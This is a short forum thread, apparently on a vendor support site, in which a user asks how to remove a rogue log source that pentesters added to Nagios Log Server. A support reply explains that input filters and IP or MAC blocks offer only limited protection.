Remove Log Source?

[Groink]

Hi, I'm evaluating NLS, running it as a VM and I'm really starting to see the value in using this in our environment. I have a really newb question, though: how do you remove log sources from NLS?

Here's my situation:

We are having a pentest conducted and one of the things they did was add their pentest machine to NLS and start sending commands for remote execution into the logs. It's pretty easy to add any machine to NLS if you know the URL to grab to install the script. I realize I could ask to get access to the machine and change it's rsyslog config, but it is for all intents and purposes a rogue machine. I could also just blacklist the IP and MAC, but then I could possibly be doing that for a lot of IPs if it hops around.

So, it there a way to tell NLS "stop receiving logs from this machine"? And further, is there a way to validate what machines are added to NLS so that something like this doesn't happen for real?

Thank you!

[tmcdonald]

First off, glad you enjoy the product! We've gotten a lot of positive feedback since it was released and it's one of my personal favorites.

Regarding doing this within LS itself, you can always set up an input filter to drop logs from a specific source. However, doing so is effectively the same as firewalling, and you run into the same problem with ip-hopping. Unfortunately in a pentest situation, if they know what they are doing they will be able to get around any static blocks you have in place. And any dynamic blocks (like blocking based off a MAC or DNS name) are pretty simple to circumvent as well.